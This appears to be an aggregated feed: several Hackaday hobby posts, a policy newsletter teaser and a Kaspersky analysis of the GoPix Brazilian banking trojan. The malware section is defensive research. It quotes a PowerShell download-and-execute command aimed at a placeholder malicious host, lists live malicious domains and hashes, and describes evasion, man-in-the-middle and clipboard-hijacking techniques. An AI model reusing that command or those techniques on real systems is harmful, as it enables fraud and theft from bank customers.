Every ham radio shack needs a clock; ideally one with operator-friendly features like multiple time zones and more. [cburns42] found that most solutions relied too much on an internet connection for his liking, so in true hacker fashion he decided to make his own: the operator-oriented Ham Clock CYD.
A tabbed interface goes well with the touchscreen LCD.
The Ham Clock CYD is so named for being based on the Cheap Yellow Display (CYD), an economical ESP32-based color touchscreen LCD which provides most of the core functionality. The only extra hardware is a BME280 temperature and humidity sensor, and a battery-backed DS3231 RTC module, ensuring that accurate time is kept even when the device is otherwise powered off.

It displays a load of useful operator-oriented data on the touchscreen LCD, and even has a web-based configuration page for ease of use. While the Ham Clock is a standalone device that does not depend on internet access in order to function, it does have the ability to make the most of it if available. When it has internet access over the built-in WiFi, the display incorporates specialized amateur radio data including N0NBH solar forecasts and calculated VHF/HF band conditions alongside standard meteorological data.

The CYD, sensor, and RTC are very affordable pieces of hardware which makes this clock an extremely economical build. Check out the GitHub repository for everything you’ll need to make your own, and maybe even put your own spin on it with a custom enclosure. On the other hand, if you prefer your radio-themed clocks more on the minimalist side, this Morse code clock might be right up your alley.

hackaday.com/2026/03/16/every-…

Kitchen scales are plentiful and cheap, but their accuracy and measuring speed often leave a lot to be desired. In particular the filtering out of noise can make small changes a nightmare as e.g. adding a little bit of weight slowly can result in the result never updating. This frustrated [Mark Furneaux] enough that he dug up the load cell and metal base of a scrapped laboratory scale and added a strain gauge amplifier to build a better kitchen scale around it.

The only purpose-bought part was an HX710-based strain gauge amplifier module for $7 with LED display, with the metal base getting some metal bits welded onto it to hold said module as well as a push button and toggle switch. Existing wiring from the load cell was wired into the HX710 module, with power provided from a single 18650 Li-ion cell. This was paired with the standard TP4056-based module and its protection IC.

Ultimately the entire assembly looks very much bodged together, with plentiful zip ties, hot glue and messy welding, but it’s hard to deny that it seems to work well. A plastic cutting board makes for a good surface for the items being weighed, and measured drift across the range was about 200 mg, while the amplifier module updates the output in real-time so that you can see even the smallest changes and noise.

Even if you’re not lucky enough to have such a nice load cell and base kicking around, strain gauges are everywhere, and you can absolutely hack an existing (kitchen) scale to be better with some custom hard- and software.

youtube.com/embed/3ANcyO0-xRQ?…

hackaday.com/2026/03/16/making…

Lego train sets have been available for decades, now. The Danish manufacturer long ago realized the magic of combining its building block sets with motors and plastic rails to create real working railways for children and adults to enjoy. Over the years, Lego has innovated through several generations of trains, from classic metal-rail systems to the more modern IR and later Bluetooth-controlled versions. The only thing largely missing over all that time, though…? A bridge!

Yes, Lego has largely neglected to build any bridges for its mainstream train lineup. There are aftermarket solutions, and innovative hacks invented by the community, all with their own limitations and drawbacks. This glaring oversight, though, seemed like a perfect opportunity to me. It was time to fire up the 3D printer and churn out a fully-realized Lego rail bridge of my very own.

Bridges Are Hard

I’ve experimented with building Lego rail bridges before, using standard track and household objects like cardboard, books, and beer. Unfortunately, it can be very difficult to support the track evenly at the joints which occur every 150mm, and derailments are common. Credit: author
There’s actually a good reason Lego bridges aren’t a big thing in the company’s own product lineup, beyond a few obscure historical parts. This is probably because they aren’t very practical. Lego locomotives are not particularly strong haulers, nor do they have excellent grip on the rails, and this makes them very poor at climbing even mild grades. Any official Lego bridge would have to be very long with a shallow slope just to allow a train to climb high enough to clear a locomotive on a track below. This would end up being an expensive set that would probably prove unpopular with the casual Lego train builder, even if the diehard enthusiasts loved it.

There are third-party options available out there. However, most rely on standard Lego track pieces and merely combine them with supports that hold them up at height. This can work in some cases, but it can be very difficult to do cool things like passing a Lego train under a bridge, for example. It can be hard to gain enough height, and the short length of Lego track pieces makes it hard to squeeze a locomotive between supports.

However, none of these problems are insurmountable if you’re dedicated to the task. The trick is in being able to make entire pieces of Lego track with custom geometry to suit your exact needs. I’ve always tried to add bridges to my Lego railways, and I’ve found that trying to do so with the standard track pieces is often difficult. At just 150 mm long, they require a lot of supports, particularly at the joints, and it can be difficult to build any sort of structure that is stable enough to hold together without a train derailing across it. After many prior experiments, I figured that 3D printing bespoke bridge pieces would probably be the way to go to build a stable Lego train bridge that actually works.

Research And Development

Recreating basic Lego rail geometry was task 1. Credit: author
I started my work by recreating the track geometry so that my 3D printed parts would work with official Lego track. I was able to recreate the rails and the inter-track coupler design, based on a drawing available at the L-Gauge website. From there, I began my bridge design, starting with picking the most critical number—the grade of the bridge. Having done some research on Lego trains online, combined with my own prior tests, I figured a 10 degree grade would be low enough for a Lego train to climb without too much trouble. I also wanted to make the individual bridge pieces as long as possible to reduce the number of joints involved. I landed on a figure of approximately 290 mm, as this was the largest track length I could fit by printing diagonally on my printer.
The basic bridge design. The three ramp pieces repeat on the other side. Credit: author
I quickly worked up a design that involved seven separate pieces to create a whole bridge. Three individual ramp pieces on each side, plus a central flat bridge piece that has a piece of track passing at a perpendicular angle underneath. In total, the whole bridge measures almost two meters long, mostly because Lego locomotives only like a gentle climb and it’s quite a hike to get high enough to clear a train passing below.
The arches and pillars are probably excessive but they allow the bridge to be printed without support. Credit: author
From the get go, I wanted to print without supports—both for speed and to save plastic. This took some experimentation, but I mostly achieved success by using arches and subtle curves to keep overhangs in check and create a structure that would print cleanly.

With that said, one might argue that the excessive amount of arches and pillars used in my design might have wasted more plastic than just using standard supports generated by the slicer. Regardless, I think the choice to go with arches gave the bridge a nice aesthetic befitting a good railway. I printed the bridge pieces in PLA at a layer height of 0.20 mm, using two-colored filament just because I could, and it was cheap at the store. While some of the diagonal stretches of the rails featured obvious layer lines, this didn’t seem to have any negative effect on performance. It did, however, give the trains a zippy sound when they climbed and descended the bridge.
The completed bridge, prior to construction of supporting railway infrastructure. Credit: authorShorter carriages work best due to the relatively sudden transition between the 10-degree grade and flat running. Credit: author
I set about testing the bridge design by inviting some friends over and building a railway in my living room. We set up a simple S-shaped loop that would allow a single train to test both the bridge itself and the passthrough track underneath. Early testing revealed some fun unexpected problems. Right off the bat, we found that one Lego locomotive had a low-slung piece that would smash into the track coupler as it came down off the bridge back on to the flat rails at ground level. Removing that piece barely compromised the look of the locomotive but enabled it to pass the bridge more easily.

We also soon found issues with carriages. Even at a subtle 10-degree grade, most Lego locomotives struggled to pull more than a single carriage up the slope. Further compounding the problem was that the momentum from the extra carriages on the downhill tended to overspeed the train and derail it at an immediately-following turn. Some carriages and locomotives were also simply incompatible with the bridge due to my design decisions. I had not paid much attention to the transitions on and off the sloped ramps. This meant that some longer carriages with wider-spread bogies would find themselves derailing as one set of wheels left the track while passing over the bridge. There were also some minor issues with the bridge pieces themselves and how they couple together. The Lego track coupling design is pretty good at snapping pieces together when they’re injection molded. It doesn’t work as well with softer 3D-printed PLA, nor is it good at locking together big heavy pieces of bridge that weigh many hundreds of grams each.
The custom bridge allows for the construction of fun new layouts that aren’t readily achievable with standard Lego parts. Credit: author
Nevertheless, the bridge design did mostly work if you were careful and only ran the right trains. With a layout built to suit the vagaries of over-bridge travel, with lots of straights for run-up and run-off, it was possible to climb and descend without too much trouble. The underpass track was also perfectly serviceable and presented precisely no problems during hours of play.

youtube.com/embed/TCQSsiFaXwY?…

This bridge design could be easily improved. I’d probably rework the design with a lower grade—maybe 7 degrees, maybe 5—and really smooth out the transitions on and off the slope to allow as many different Lego trains to use the bridge as possible. Beyond that, it would simply be a matter of improving printability and reducing plastic use to really make this project shine. For those eager to try printing what I built, the files are available, but just be wary that your mileage, and your train’s mileage, may vary.

The fun thing about 3D printers is that they are perfect for jobs like this. If you need to make a plastic part with specific geometry, it’s now almost trivial to do. That makes recreating or innovating on things like toys or home appliances really easy, and also very fun. I had a blast designing this bridge and putting it together, and even more fun playing trains with my friends. I’d highly recommend taking a shot yourself if you feel like tinkering with Lego railways at home!

hackaday.com/2026/03/16/how-i-…

Tic-Tac-Toe is a relatively simple game, and one of the few which has effectively been solved for perfect play. The nature of the game made it possible for [Joost van Velzen] to create a LEGO machine that can play the game properly in an entirely mechanical fashion.

The build features no electronics to speak of. Instead, it uses 52 mechanical logic gates and 204 bits of mechanical memory to understand and process the game state and respond with appropriate moves in turn. There are some limitations to the build, however—the game state always begins with the machine taking the center square. Furthermore, the initial move must always be played on one of two squares—given the nature of the game though, this doesn’t really make a difference.

It’s also worth heading over to the Flickr page for the project just to appreciate the aesthetics of the build. It’s styled in the fashion of an 18th-century automaton or similar. It’s also been shared on LEGO Ideas where it’s raised quite a profile.

If you’ve ever wanted to think about computing in a mechanical sense, this build is a great example of how it can be done. We often see some fun LEGO machines around these parts, from massive parts sorters to somewhat-functional typewriters.

youtube.com/embed/soklpa_JZOI?…

hackaday.com/2026/03/16/lego-m…

They say you should never throw out old clothes because they will come back in style one day. Maybe they are right. We noted in a recent BBC post that, apparently, wired headphones are making a comeback. Like many people, we were dismayed when Apple took the headphone jack out of the iPhone and, as [Thomas Germain] notes, even Google eventually ejected the normal headphone jack. (Although, in fairness, most of the Pixel phones we’ve seen come with a pair of USB-C earbuds.)

On the face of it, though, wireless seems to be a good idea. You can get cheap Bluetooth earbuds now, although maybe still not as cheap as wired buds. Sure, they sound terrible, but so do cheap buds. It is a pain to charge them, of course, but not having to untangle wires is a benefit. On the other hand, you never have to charge your wired headphones.

So why are people suddenly going back to wires? According to the BBC and analytics firm Circana, the second half of 2025 saw an explosion in wired headphone sales, and sales continued to rise in 2026.

youtube.com/embed/vGH5220CHuY?…

Quality of Sound

The biggest reason cited was sound quality. While Bluetooth has made huge strides in sound quality, you are still trading something for wireless. We have to admit, we get annoyed when the Bluetooth drops out, but we wonder how many people can really hear much difference in audio quality? If you care about latency, maybe that’s a point in the wired gear’s favor. But if your song starts 250 milliseconds late, you probably don’t care. It is only an issue when you have video or games.

Many people, when using a modern Bluetooth stack, can’t tell the difference in audio quality between wired and wireless, especially with normal source material and in typical listening environments.

According to [SoundGuys], while Bluetooth is technically worse, if you are over 24 or not in a perfectly quiet environment, you probably can’t tell the difference. Another study found that casual listeners could only guess which headphones were wireless 50% of the time. Even two pro audio people got it wrong 30% of the time.

It Got Better

The problem historically with Bluetooth is that it creates a digital stream to the headphones, which is compressed and decompressed using a codec. The original codec was SBC (Subband Codec), and it didn’t sound that great.

However, as technology gets better, so do the codecs. AAC, LDAC, and others sound great. LDAC, for example, transmits audio at roughly 990 kbps and with very little distortion.

youtube.com/embed/XU_XUgnvgt4?…

So when you are looking at Bluetooth sound, you have to account for several things. If your source or destination doesn’t support modern codecs, it might not sound as good as it could. In addition, you are dealing with the headphone’s internal digital-to-analog converter. If you think your $10 earbuds have a converter that matches the audio output from your phone or motherboard, you will probably be disappointed. But that’s not a fault inherent with Bluetooth. Cheap sound devices sound worse than expensive ones, in general.

Other Reasons

There are other reasons to go wired. Apparently, some social media influencers have decided that the right pair of wires dangling from your ears is a fashion accessory. Maybe some of it is like the resurgence of vinyl records or typewriters: nostalgia. Or, perhaps it is just a fad. As a practical matter, it does help people see that you are just sitting at your desk swaying for no reason.

Apparently, even the brand and design of headphones are important to fashionistas. For example, the three-year-old video below shows how old Koss headphones with some color changes went viral. (Although of course you can also get a Bluetooth variant.)

youtube.com/embed/eehbsqKmyg8?…

While this might not make sense to a Hackaday crowd, headphones have long been a fashion accessory, and headphones like Beats were, at least at one point, the must-have accessory for some people.

Of course, if you really want to make a statement, you can check whether any of the 10 $135,000 headphones are in stock. Or, try a $750,000 pair of Beats, which probably don’t sound as good as you would hope for that price.

Back to Reality

There are people who swear they need gold-plated cables or ones with no oxygen or whatever to get the perfect sound. Tests involving sending audio through a banana don’t back that up.

So, sure, you need to invest in good-quality gear. You really need to make sure the whole setup supports something like aptX, LDAC, or even AAC. You also need a good source. Old movies don’t look better on an 8K TV; after all, why should your headphones improve your 1979 mix tape digitized at 32k?

youtube.com/embed/IvIYh87Eihs?…

Unless you are worried about latency or you experience dropouts for some reason, there is very little difference for most people. Of course, if you want to use a wired headphone on a modern phone, you probably need an adapter or USB headphones, which basically have the adapter built in. And your audio will only be as good as that adapter, too, so choose wisely. Don’t forget to pick the right cables, too.

If you are experiencing dropouts, you may need better equipment. Or maybe just take your phone out of your pocket with the keys and the RFID-blocking wallet. Bluetooth can, in theory, travel 30 ft, but reality is something else, and interference from other devices can also be a problem, especially if you have a dual WiFi/Bluetooth device in your computer. We’ve heard, too, that unpairing and repairing can sometimes help, although you wouldn’t think it should matter.

One thing we do suggest. As long as wired headphones are a fad, it is probably a great time to list your old wired gear on eBay, Facebook Marketplace, or a similar site. Fads drive prices up, and the old cans may never be worth so much again.

Your Turn

So what do you think? Can you really tell the difference? What’s your daily driver? Let us know in the comments.

hackaday.com/2026/03/16/ask-ha…

IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and I'll be speaking at the annual CPDP conference in Brussels in May about how to boost researchers' access to social media data in the name of platform governance. If that's your bag, come say hello here.

— Countries are barreling ahead with kids' social media bans without assessing the evidence and failing to understand the likely collateral damage.

– Canada offers an example of how a so-called Middle Power can both increase its digital sovereignty without cutting itself off from the global tech community.

— Europe's national agencies in charge of the Digital Services Act come from markedly different regulatory traditions.

Let's get started:

digitalpolitics.co/newsletter0…

Introduction

GoPix is an advanced persistent threat targeting Brazilian financial institutions’ customers and cryptocurrency users. It represents an evolved threat targeting internet banking users through memory-only implants and obfuscated PowerShell scripts. It evolved from the RAT and Automated Transfer System (ATS) threats that were used in other malware campaigns into a unique threat never seen before. Operating as a LOLBin (Living-off-the-Land Binary), GoPix exemplifies a sophisticated approach that integrates malvertising vectors via platforms such as Google Ads to compromise prominent financial institutions’ customers.

Our extensive analysis reveals GoPix’s capabilities to execute man-in-the-middle attacks, monitor Pix transactions, Boleto slips, and manipulate cryptocurrency transactions. The malware strategically bypasses security measures implemented by financial institutions while maintaining persistence and employing robust cleanup mechanisms to challenge Digital Forensics and Incident Response (DFIR) efforts.

GoPix has reached a level of sophistication never before seen in malware originating in Brazil. It’s been over three years since we first identified it, and it remains highly active. The threat is recognized for its stealthy methods of infecting victims and evading detection by security software, using new tricks to stay operable.

The threat differs in its behavior from the RATs already seen in other Brazilian families, such as Grandoreiro. GoPix uses C2s with a very short lifespan, which stay online only for a few hours. In addition, the attackers behind this threat abuse legitimate anti-fraud and reputation services to perform targeted delivery of its payload and ensure that they have not infected a sandbox or system used in analysis. They handpick their victims, financial bodies of state governments and large corporations.

The campaign leverages a malvertisement technique which has been active since December 2022. The strategic use of multiple obfuscation layers and a stolen code signing certificate showcases GoPix’s ability to evade traditional security defenses and steal and manipulate sensitive financial data.

The Brazilian group behind GoPix is clearly learning from APT groups to make malware persistent and hide it, loading its modules into memory, keeping few artifacts on disk, and making hunting with YARA rules ineffective for capturing them. The malware can also switch between processes for specific functionalities, potentially disabling security software, as well as executing a man-in-the-middle attack with a previously unseen technique.

Initial infection

Initial infection is achieved through malvertising campaigns. The threat actors in most cases use Google Ads to spread baits related to popular services like WhatsApp, Google Chrome, and the Brazilian postal service Correios and lure victims to malicious landing pages.

We have been monitoring this threat since 2023, and it continues to be very active for the time being.

GoPix malware campaign detections (download)

The initial infection vector is shown below:

Initial infection vector

When the user ends up on the GoPix landing page, the malware abuses legitimate IP scoring systems to determine whether the user is a target of interest or a bot running in malware analysis environments. The initial scoring is done through a legitimate anti-fraud service, with a number of browser and environment parameters sent to this service, which returns a request ID. The malicious website uses this ID to check whether the user should receive the malicious installer or be redirected to a harmless dummy landing page. If the user is not considered a valuable target, no malware is delivered.

Website shown if the user is detected as a bot or sandbox

However, if the victim passes the bot check, the malicious website will query the check.php endpoint, which will then return a JSON response with two URLs:

JSON response from a malicious endpoint

The victim will then be presented with a fake webpage offering to download advertised software, this being the malicious “WhatsApp Web installer” in the case at hand. To decide which URL the victim will be redirected to, another check happens in the JavaScript code for whether the 27275 port is open on localhost.

WebSocket request to check if the port is open

This port is used by the Avast Safe Banking feature, present in many Avast products, which are very popular in countries like Brazil. If the port is open, the victim is led to download the first-stage payload from the second URL (url2). It is a ZIP file containing an LNK file with an obfuscated PowerShell designed to download the next stage. If the port is closed, the victim is redirected to the first URL (url), which offers to download a fake WhatsApp executable NSIS installer.
At first, we thought this detection could lead the victim to a potential exploit. However, during our research, we discovered that the only difference was that if Avast was installed, the victim was led to another infection vector, which we describe below.

Malware delivered through a malicious website

Infection chain

First-stage payload

If no Avast solution is installed, an executable NSIS installer file is delivered to the victim’s device. The attackers change this installer frequently to avoid detection. It’s digitally signed with a stolen code signing certificate issued to “PLK Management Limited”, also used to sign the legitimate “Driver Easy Pro” software.

Stolen certificate used to sign the malicious installer

The purpose of the NSIS installer is to create and run an obfuscated batch file, which will use PowerShell to make a request to the malicious website for the next-stage payload.

NSIS installer code creating a batch file

However, if the 27275 port is open, indicating the victim has an Avast product installed, the infection happens through the second URL. The victim is led to download a ZIP file with an LNK file inside. This shortcut file contains an obfuscated command line.

Obfuscated command line inside the LNK

Deobfuscated command line:
WindowsPowerShell\v10\powershell (New-Object NetWebClient)UploadString("http://MALICIOUS/1/","tHSb")|$env:E -
The purpose of this command line is to download and execute the next-stage payload from the malicious URL referenced above.

It’s highly likely this method is used because Avast Safe Browser blocks direct downloads of executable files, so instead of downloading the executable NSIS installer, a ZIP file is delivered.

Once the PowerShell command from either the LNK or EXE file is executed, GoPix executes yet another obfuscated PowerShell script that is remotely retrieved (in the GoPix downloader image below, it’s defined as “PowerShell Script”).

GoPix delivery chain

Initial PowerShell script

This script’s purpose is to collect system information and send it to the GoPix C2. Upon doing so, the script obtains a JSON file containing GoPix modules and a configuration that is saved on the victim’s computer.

System information collection

The information contained within this JSON is as follows:

• Folder and file names to be created under the %APPDATA% directory
• Obfuscated PowerShell script
• Encrypted PowerShell script ps
• Malicious code implant sc containing encrypted GoPix dropper shellcode, GoPix dropper, main payload shellcode and main GoPix implant
• GoPix configuration file pf

Once these files are saved, an additional batch file is also created and executed. Its purpose is to launch the obfuscated PowerShell script.
PSExecutionPolicyPreference=Unrestricted
powershell -File "$scriptPath"
exit

Obfuscated PowerShell script

Upon execution, the obfuscated PowerShell script decrypts the encrypted PowerShell script ps, starts another PowerShell instance, and passes the decrypted script through its stdin, so that the decrypted script is never loaded to disk.

Deobfuscated PowerShell script

Decrypted PowerShell script “ps”

The purpose of this memory-only PowerShell script is to perform an in-memory decryption of the GoPix dropper shellcode, GoPix dropper, main payload shellcode and main GoPix malware implant into allocated memory. After that, it creates a small piece of shellcode within the PowerShell process to jump to the GoPix dropper shellcode previously decrypted.

PowerShell script shellcode jumps to the malware loader shellcode

The GoPix dropper shellcode is built for either the x86 or x64 architecture, depending on the victim’s computer.

Building the GoPix shellcode depending on the targeted architecture

Shellcode

This shellcode is bundled with the malware and stays in encrypted form on disk. It is utilized at two separate stages of the infection chain: first to launch the GoPix dropper and subsequently to execute the main GoPix malware. We’ve observed two versions of this shellcode. The main difference is the old one resolves API addresses by their names, while the latest one employs a hashing algorithm to determine the address of a given API. The API hash calculation begins by generating a hash for the DLL name, and this resulting hash is then used within the function name to compute the final API hash.

The old sample (left) used stack strings with API names. The new sample (right) uses the API hashing obfuscation technique

The first time GoPix is dropped into memory through PowerShell, its structure is as follows:

1. Memory dropper shellcode
2. Memory dropper DLL
3. Main payload shellcode
4. Main payload DLL

Both DLLs have their MZ signature erased, which helps to evade detection by memory dumping tools that scan for PE files in memory.

MZ signature zeroed

GoPix dropper

When the main function from the dropper is called, it verifies if it is running within an Explorer.exe process; if not, it will terminate. It then sequentially checks for installed browsers — Chrome, Firefox, Edge, and Opera — retrieving the full path of the first detected browser from the registry key SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths. A significant difference from previously analyzed droppers is that this version encrypts each string using a unique algorithm.

After selecting the browser, the dropper uses direct syscalls to launch the chosen browser process in a suspended state. This allows it to inject the main GoPix shellcode and its parameters into the process. The injected shellcode is tasked with extracting and loading the main GoPix implant directly into memory, subsequently calling its exported main function. The parameters passed include the number 1, to trigger the main GoPix function, and the current Process ID, which is that of Explorer.exe.

The dropper uses a syscall instruction and calls the GoPix in-memory implant’s main function

Main GoPix implant

Clipboard stealing functionality

Boleto bancário was added as one of the targets to the malware’s clipboard stealing and replacing feature. Boleto is a popular payment method in Brazil that functions similarly to an invoice, being the second most popular payment system in the country. It is a standardized document that includes important payment information such as the amount due, due date, and details of the payee. It features a typeable line, which is a sequence of numbers that can be entered in online banking applications to pay. This line is what GoPix targets with its functionality. An example of such a line is “23790.12345 60000.123456 78901.234567 8 76540000010000”.

Boleto bancário targeted in clipboard-stealing functionality

When GoPix detects a Pix or Boleto transaction, it simply sends this information to the C2. However, when a Bitcoin or Ethereum wallet is copied to the clipboard, the malware replaces the address with one belonging to the threat actor.

Unique man-in-the-middle attack

PAC (Proxy AutoConfig) files are nothing new; they’ve been used by Brazilian criminals for over two decades, but GoPix takes this to another level. While in the past, criminals used PAC files to redirect victims to a fake phishing page, the purpose of the PAC file in GoPix attacks is to manipulate the traffic while the user navigates the legitimate financial website.

In order to hide which site GoPix wants to intercept, it uses a CRC32 algorithm in the host field of the PAC file. It is formatted on the fly using a pf configuration file: the items in it determine which proxy the victim will be redirected to. To hide its malicious proxy server, once a connection is opened to the proxy server, the malware enumerates all connections and finds the process that initiated it. It then takes the process executable name CRC32C checksum and compares it with a hardcoded list of browsers’ CRC checksums. If it doesn’t match a known browser, the malware simply terminates the connection.

PAC file excerpt

To uncover GoPix targets, we compiled a list of many Brazilian financial institution domains and subdomains, computed their CRC32 checksums, and compared them against GoPix hardcoded values. The table below shows each CRC32 and its target.

HTTPS interception

Since every communication is encrypted via HTTPS, GoPix bypasses this by injecting a trusted root certificate into the memory of a web browser while on the victim’s machine. This allows the attacker to sniff and even manipulate the victim’s traffic. We have found two certificates across GoPix samples, one that expired in January 2025 and another created in February 2025 that is set to expire in February 2027.

GoPix trusted root certificate

Conclusion

With the ability to load its memory-only implant that employs a malicious Proxy AutoConfig (PAC) file and an HTTP server to execute an unprecedented man-in-the-middle attack, GoPix is by far the most advanced banking Trojan of Brazilian origin. The injection of a trusted root certificate into the browser enhances its ability to intercept and manipulate sensitive financial data while maintaining its stealth profile, as the malicious certificate is not visible to operating system tools. Additionally, GoPix has expanded its clipboard monitoring capability by adding Boleto slips to its arsenal, which already includes Pix transactions and cryptowallets addresses.

This is a sophisticated threat, with multiple layers of evasion, persistence, and functionality. The investigation into the malware’s shellcode, dropper, and main module uncovered intricate mechanisms, including process jumping to leverage specific functionalities across processes. This technique, combined with robust string encryption methods applied to both the dropper and main payload, indicates that the threat actor has gone to great lengths to hinder detection. Interestingly enough, attackers adopted the use of a legitimate commercial anti-fraud service to pre-qualify their targets, aiming to avoid sandboxes and security researchers’ investigations. Additionally, the persistence and cleanup mechanisms implemented by the malware enhance its durability during incident response efforts, with very short C2 lifespans.

For further information on GoPix and all technical details, please contact crimewareintel@kaspersky.com.

Kaspersky’s products detect this threat as HEUR:Trojan-Banker.Win64.GoPix, Trojan.PowerShell.GoPix, and HEUR:Trojan-Banker.OLE2.GoPix.

Indicators of compromise

EB0B4E35A2BA442821E28D617DD2DAA2 – NSIS installer
C64AE7C50394799CE02E97288A12FFF – ZIP archive with an LNK file
D3A17CB4CDBA724A0021F5076B33A103 – Malware dropper
28C314ACC587F1EA5C5666E935DB716C – Main payload

Malicious Certificate Thumbprint
<Name(CN=Root CA 2024)> f110d0bd7f3bd1c7b276dc78154dd21eef953384
<Name(CN=Root CA 2025)> 1b1f85b68e6c9fde709d975a186185c94c0faa51

C2
paletolife[.]com

Domains and IPs
https://correioez0ubcfht9i3.lovehomely[.]com/
https://correiotwknx9gu315h.lovehomely[.]com/
http://webmensagens4bb7[.]com/
https://mydigitalrevival[.]com/get.php
http://b3d0[.]com/1/
http://4a3d[.]com/1/
http://9de1[.]com/1/
http://ef0h[.]com/1/
http://yogarecap[.]com/1/

securelist.com/gopix-banking-t…

If you have ever read science fiction, you’ve probably seen “alternate history” stories. You know, where Europeans didn’t discover the New World until the 19th century, or the ancient Egyptians stumbled upon electricity. Maybe those things happened in an alternate universe. [BillPG] has an alternate history tale for us that imagines IPv6 was shot down and a protocol called IPv4x became prominent instead.

The key idea is that in 1993, the IP-Next-Generation working group could have decided that any solution that would break the existing network wouldn’t work. There is precedent. Stereo records play on mono players and vice versa. Color TV signals play on black and white sets just as well as black and white signals play on color TVs. It would have made perfect sense.

How could this be? The idea was to make everyone who “owns” an IPv4 address the stewards of a 96-bit sub-address block. IPv4x-aware equipment extracts the entire 128-bit address. IPv4-only equipment routes the packet to the controlling IPv4 address. Wasteful? Sure. Most people don’t need 79 octillion addresses. But if everyone has that many, then why not?

The fictional timeline has DNS and DHCP, along with dial-up stacks, changing to accommodate the new addresses. Again, you had to assume some parts of the network were still IPv4-only. DNS would return both addresses, and it was up to you to pick the IPv4x address if you understood it.

Your ISP would probably not offer you the entire extra space. A regional router could handle all traffic for your neighborhood and then direct it to your specific 128-bit address or your pool of addresses, if you have multiple devices. No need for NAT to hide your devices, nor strange router configurations to punch traffic through.

Of course, back in the real world, we have two incompatible systems: IPv4 and IPv6. IPv6 adoption has been slow and painful. We wondered why [BillPG] wrote about this future that never was. Turns out, he’s proposed a gateway that IPv6 hosts can provide to allow access from IPv4-only networks. Pretty sneaky, but we can admire it. If reading all this makes you wonder what happened to IPv5, we wondered that, too.

hackaday.com/2026/03/16/the-ip…